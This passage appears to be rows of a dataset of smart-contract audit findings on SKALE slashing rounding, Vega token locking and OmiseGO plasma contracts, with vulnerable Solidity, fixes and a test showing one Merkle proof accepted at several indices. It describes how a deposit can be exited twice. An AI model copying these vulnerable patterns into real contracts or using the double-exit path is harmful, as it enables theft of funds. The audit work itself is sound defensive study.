confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n\\nWhen holders process slashings, they reduce `_delegatedByHolderToValidator`, `_delegatedByHolder`, `_effectiveDelegatedByHolderToValidator` values.\\n```\\nif (oldValue > 0) {\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n reduce(\\n \\_effectiveDelegatedByHolderToValidator[holder][validatorId],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId, month));\\n}\\n```\\n\\nAlso when holders are undelegating, they are calculating how many tokens from `delegations[delegationId].amount` were slashed.\\n```\\nuint amountAfterSlashing = calculateDelegationAmountAfterSlashing(delegationId);\\n```\\n\\nAll these values should be calculated one from another, but they all will have different rounding errors after slashing. For example, the assumptions that the total sum of all delegations from holder `X` to validator `Y` should still be equal to `_delegatedByHolderToValidator[X][Y]` is not true anymore. The problem is that these assumptions are still used. For example, when undelegating some delegation with delegated `amount` equals amount(after slashing), the holder will reduce `_delegatedByHolderToValidator[X][Y]`, `_delegatedByHolder[X]` and `_delegatedToValidator[Y]` by `amount`. Since rounding errors of all these values are different that will lead to 2 possible scenarios:\\nIf rounding error reduces `amount` not that much as other values, we can have `uint` underflow. This is especially dangerous because all calculations are delayed and we will know about underflow and `SafeMath` revert in the next month or later.\\nDevelopers already made sure that rounding errors are aligned in a correct way, and that the reduced value should always be larger than the subtracted, so there should not be underflow. This solution is very unstable because it's hard to verify it and keep in mind even during a small code change. 2. If rounding errors make `amount` smaller then it should be, when other values should be zero (for example, when all the delegations are undelegated), these values will become some very small values. The problem here is that it would be impossible to compare values to zero.","Consider not calling `revert` on these subtractions and make result value be equals to zero if underflow happens.\\nConsider comparing to some small `epsilon` value instead of zero. Or similar to the previous point, on every subtraction check if the value is smaller then `epsilon`, and make it zero if it is.",,"```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n" +Slashes do not affect bounty distribution,high,"When slashes are processed by a holder, only `_delegatedByHolderToValidator` and `_delegatedByHolder` values are reduced. But `_effectiveDelegatedByHolderToValidator` value remains the same. This value is used to distribute bounties amongst delegators. So slashing will not affect that distribution.\\n```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n",Reduce `_effectiveDelegatedByHolderToValidator` and `_effectiveDelegatedToValidator` when slashes are processed.,,"```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n" +Storage operations optimization,medium,"There are a lot of operations that write some value to the storage (uses `SSTORE` opcode) without actually changing it.\\nIn `getAndUpdateValue` function of `DelegationController` and TokenLaunchLocker:\\n```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n\\nIn `handleSlash` function of `Punisher` contract `amount` will be zero in most cases:\\n```\\nfunction handleSlash(address holder, uint amount) external allow(""DelegationController"") {\\n \\_locked[holder] = \\_locked[holder].add(amount);\\n}\\n```\\n",Resolution\\nMitigated in skalenetwork/skale-manager#179\\nCheck if the value is the same and don't write it to the storage in that case.,,```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n +Function overloading,low,"Some functions in the codebase are overloaded. That makes code less readable and increases the probability of missing bugs.\\nFor example, there are a lot of `reduce` function implementations in DelegationController:\\n```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n",Resolution\\nFixed in skalenetwork/skale-manager#181\\nAvoid function overloading as a general guideline.,,"```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n" +ERC20Lockable - inconsistent locking status,low,"`Vega_Token.is_tradable()` will incorrectly return `false` if the token is never manually unlocked by the owner but `unlock_time` has passed, which will automatically unlock trading.\\n```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n",declare `_is_locked` as `private` instead of `public`\\ncreate a getter method that correctly returns the locking status\\n```\\nfunction \\_isLocked() internal view {\\n return !\\_is\\_locked || now > unlock\\_date;\\n}\\n```\\n\\nmake `modifier onlyUnlocked()` use the newly created getter (_isLocked())\\nmake `Vega_Token.is_tradeable()` use the newly created getter (_isLocked())\\n`_unlock()` should raise an errorcondition when called on an already unlocked contract\\nit could make sense to emit a “contract hast been unlocked” event for auditing purposes,,"```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n" +Merkle.checkMembership allows existence proofs for the same leaf in multiple locations in the tree,high,"`checkMembership` is used by several contracts to prove that transactions exist in the child chain. The function uses a `leaf`, an `index`, and a `proof` to construct a hypothetical root hash. This constructed hash is compared to the passed in `rootHash` parameter. If the two are equivalent, the `proof` is considered valid.\\nThe proof is performed iteratively, and uses a pseudo-index (j) to determine whether the next proof element represents a “left branch” or “right branch”:\\n```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n\\nIf `j` is even, the computed hash is placed before the next proof element. If `j` is odd, the computed hash is placed after the next proof element. After each iteration, `j` is decremented by `j` = `j` / 2.\\nBecause `checkMembership` makes no requirements on the height of the tree or the size of the proof relative to the provided `index`, it is possible to pass in invalid values for `index` that prove a leaf's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that for a tree with 3 leaves, leaf 2 can be proven to exist at indices 2, 6, and 10 using the same proof each time. The modified test can be found here: https://gist.github.com/wadeAlexC/01b60099282a026f8dc1ac85d83489fd#file-merkle-test-js-L40-L67\\n```\\nit('should accidentally allow different indices to use the same proof', async () => {\\n const rootHash = this.merkleTree.root;\\n const proof = this.merkleTree.getInclusionProof(leaves[2]);\\n\\n const result = await this.merkleContract.checkMembership(\\n leaves[2],\\n 2,\\n rootHash,\\n proof,\\n );\\n expect(result).to.be.true;\\n\\n const nextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 6,\\n rootHash,\\n proof,\\n );\\n expect(nextResult).to.be.true;\\n\\n const nextNextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 10,\\n rootHash,\\n proof,\\n );\\n expect(nextNextResult).to.be.true;\\n});\\n```\\n\\nConclusion\\nExit processing is meant to bypass exits processed more than once. This is implemented using an “output id” system, where each exited output should correspond to a unique id that gets flagged in the `ExitGameController` contract as it's exited. Before an exit is processed, its output id is calculated and checked against `ExitGameController`. If the output has already been exited, the exit being processed is deleted and skipped. Crucially, output id is calculated differently for standard transactions and deposit transactions: deposit output ids factor in the transaction index.\\nBy using the behavior described in this issue in conjunction with methods discussed in issue 5.8 and https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20, we showed that deposit transactions can be exited twice using indices `0` and `2**16`. Because of the distinct output id calculation, these exits have different output ids and can be processed twice, allowing users to exit double their deposited amount.\\nA modified `StandardExit.load.test.js` shows that exits are successfully enqueued with a transaction index of 65536: https://gist.github.com/wadeAlexC/4ad459b7510e512bc9556e7c919e0965#file-standardexit-load-test-js-L55","Use the length of the proof to determine the maximum allowed index. The passed-in index should satisfy the following criterion: `index < 2**(proof.length/32)`. Additionally, ensure range checks on transaction position decoding are sufficiently restrictive (see https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20).\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/546",,"```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n" +Improper initialization of spending condition abstraction allows “v2 transactions” to exit using PaymentExitGame,high,"`PaymentOutputToPaymentTxCondition` is an abstraction around the transaction signature check needed for many components of the exit games. Its only function, `verify`, returns `true` if one transaction (inputTxBytes) is spent by another transaction (spendingTxBytes):\\n```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, ""Input tx is an unsupported payment tx type"");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, ""The spending tx is an unsupported payment tx type"");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n ""Spending tx points to the incorrect output UTXO position""\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\n return true;\\n}\\n```\\n\\nVerification process\\nThe verification process is relatively straightforward. The contract performs some basic input validation, checking that the input transaction's `txType` matches `supportInputTxType`, and that the spending transaction's `txType` matches `supportSpendingTxType`. These values are set during construction.\\nNext, `verify` checks that the spending transaction contains an input that matches the position of one of the input transaction's outputs.\\nFinally, `verify` performs an EIP-712 hash on the spending transaction, and ensures it is signed by the owner of the output in question.\\nImplications of the abstraction\\nThe abstraction used requires several files to be visited to fully understand the function of each line of code: `ISpendingCondition`, `PaymentEIP712Lib`, `UtxoPosLib`, `TxPosLib`, `PaymentTransactionModel`, `PaymentOutputModel`, `RLPReader`, `ECDSA`, and `SpendingConditionRegistry`. Additionally, the abstraction obfuscates the underlying spending condition verification primitive where used.\\nFinally, understanding the abstraction requires an understanding of how `SpendingConditionRegistry` is initialized, as well as the nature of its relationship with `PlasmaFramework` and `ExitGameRegistry`. The aforementioned `txType` values, `supportInputTxType` and `supportSpendingTxType`, are set during construction. Their use in `ExitGameRegistry` seems to suggest they are intended to represent different versions of transaction types, and that separate exit game contracts are meant to handle different transaction types:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nMigration and initialization\\nThe migration script seems to corroborate this interpretation:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L109-L124\\n```\\n// handle spending condition\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentCondition = await PaymentOutputToPaymentTxCondition.deployed();\\n\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_V2\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentV2Condition = await PaymentOutputToPaymentTxCondition.deployed();\\n```\\n\\nThe migration script shown above deploys two different versions of `PaymentOutputToPaymentTxCondition`. The first sets `supportInputTxType` and `supportSpendingTxType` to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_TX_TYPE`, respectively. The second sets those same variables to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_V2_TX_TYPE`, respectively.\\nThe migration script then registers both of these contracts in `SpendingConditionRegistry`, and then calls `renounceOwnership`, freezing the spending conditions registered permanently:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L126-L135\\n```\\nconsole.log(`Registering paymentToPaymentCondition (${paymentToPaymentCondition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_TX\\_TYPE, paymentToPaymentCondition.address,\\n);\\n\\nconsole.log(`Registering paymentToPaymentV2Condition (${paymentToPaymentV2Condition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_V2\\_TX\\_TYPE, paymentToPaymentV2Condition.address,\\n);\\nawait spendingConditionRegistry.renounceOwnership();\\n```\\n\\nFinally, the migration script registers a single exit game contract in PlasmaFramework:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L137-L143\\n```\\n// register the exit game to framework\\nawait plasmaFramework.registerExitGame(\\n PAYMENT\\_TX\\_TYPE,\\n paymentExitGame.address,\\n config.frameworks.protocols.moreVp,\\n { from: maintainerAddress },\\n);\\n```\\n\\nNote that the associated `_txType` is permanently associated with the deployed exit game contract:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nConclusion\\nCrucially, this association is never used. It is implied heavily that transactions with some `txType` must use a certain registered exit game contract. In fact, this is not true. When using `PaymentExitGame`, its routers, and their associated controllers, the `txType` is invariably inferred from the encoded transaction, not from the mappings in `ExitGameRegistry`. If initialized as-is, both `PAYMENT_TX_TYPE` and `PAYMENT_V2_TX_TYPE` transactions may be exited using `PaymentExitGame`, provided they exist in the plasma chain.","Remove `PaymentOutputToPaymentTxCondition` and `SpendingConditionRegistry`\\nImplement checks for specific spending conditions directly in exit game controllers. Emphasize clarity of function: ensure it is clear when called from the top level that a signature verification check and spending condition check are being performed.\\nIf the inferred relationship between `txType` and `PaymentExitGame` is correct, ensure that each `PaymentExitGame` router checks for its supported `txType`. Alternatively, the check could be made in `PaymentExitGame` itself.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/472",,"```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, ""Input tx is an unsupported payment tx type"");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, ""The spending tx is an unsupported payment tx type"");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n ""Spending tx points to the incorrect output UTXO position""\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\n return true;\\n}\\n```\\n" +RLPReader - Leading zeroes allow multiple valid encodings and exit / output ids for the same transaction,high,"The current implementation of RLP decoding can take 2 different `txBytes` and decode them to the same structure. Specifically, the `RLPReader.toUint` method can decode 2 different types of bytes to the same number. For example:\\n`0x821234` is decoded to `uint(0x1234)`\\n`0x83001234` is decoded to `uint(0x1234)`\\n`0xc101` can decode to `uint(1)`, even though the tag specifies a short list\\n`0x01` can decode to `uint(1)`, even though the tag specifies a single byte\\nAs explanation for this encoding:\\n`0x821234` is broken down into 2 parts:\\n`0x82` - represents `0x80` (the string tag) + `0x02` bytes encoded\\n`0x1234` - are the encoded bytes\\nThe same for 0x83001234:\\n`0x83` - represents `0x80` (the string tag) + `0x03` bytes encoded\\n`0x001234` - are the encoded bytes\\nThe current implementation casts the encoded bytes into a uint256, so these different encodings are interpreted by the contracts as the same number:\\n`uint(0x1234) = uint(0x001234)`\\n```\\nresult := mload(memPtr)\\n```\\n\\nHaving different valid encodings for the same data is a problem because the encodings are used to create hashes that are used as unique ids. This means that multiple ids can be created for the same data. The data should only have one possible id.\\nThe encoding is used to create ids in these parts of the code:\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex, \\_utxoPosValue));\\n```\\n\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex));\\n```\\n\\n```\\nbytes32 hashData = keccak256(abi.encodePacked(\\_txBytes, \\_utxoPos.value));\\n```\\n\\n```\\nreturn uint160((uint256(keccak256(\\_txBytes)) 105).setBit(151));\\n```\\n\\n```\\nbytes32 leafData = keccak256(data.txBytes);\\n```\\n\\nOther methods that are affected because they rely on the return values of these methods:","Enforce strict-length decoding for `txBytes`, and specify that `uint` is decoded from a 32-byte short string.\\nEnforcing a 32-byte length for `uint` means that `0x1234` should always be encoded as:\\n`0xa00000000000000000000000000000000000000000000000000000000000001234`\\n`0xa0` represents the tag + the length: `0x80 + 32`\\n`0000000000000000000000000000000000000000000000000000000000001234` is the number 32 bytes long with leading zeroes\\nUnfortunately, using leading zeroes is against the RLP spec:\\nhttps://github.com/ethereum/wiki/wiki/RLP\\npositive RLP integers must be represented in big endian binary form with no leading zeroes\\nThis means that libraries interacting with OMG contracts which are going to correctly and fully implement the spec will generate “incorrect” encodings for uints; encodings that are not going to be recognized by the OMG contracts.\\nFully correct spec encoding: `0x821234`. Proposed encoding in this solution: `0xa00000000000000000000000000000000000000000000000000000000000001234`.\\nSimilarly enforce restrictions where they can be added; this is possible because of the strict structure format that needs to be encoded.\\nSome other potential solutions are included below. Note that these solutions are not recommended for reasons included below:\\nNormalize the encoding that gets passed to methods that hash the transaction for use as an id:\\nThis can be implemented in the methods that call `keccak256` on `txBytes` and should decode and re-encode the passed `txBytes` in order to normalize the passed encoding.\\na `txBytes` is passed\\nthe `txBytes` are decoded into structure: `tmpDecodedStruct` = decode(txBytes)\\nthe `tmpDecodedStruct` is re-encoded in order to normalize it: `normalizedTxBytes = encode(txBytes)`\\nThis method is not recommended because it needs a Solidity encoder to be implemented and a lot of gas will be used to decode and re-encode the initial `txBytes`.\\nCorrectly and fully implement RLP decoding\\nThis is another solution that adds a lot of code and is prone to errors.\\nThe solution would be to enforce all of the restrictions when decoding and not accept any encoding that doesn't fully follow the spec. This for example means that is should not accept uints with leading zeroes.\\nThis is a problem because it needs a lot of code that is not easy to write in Solidity (or EVM).",,```\\nresult := mload(memPtr)\\n```\\n +Recommendation: Remove 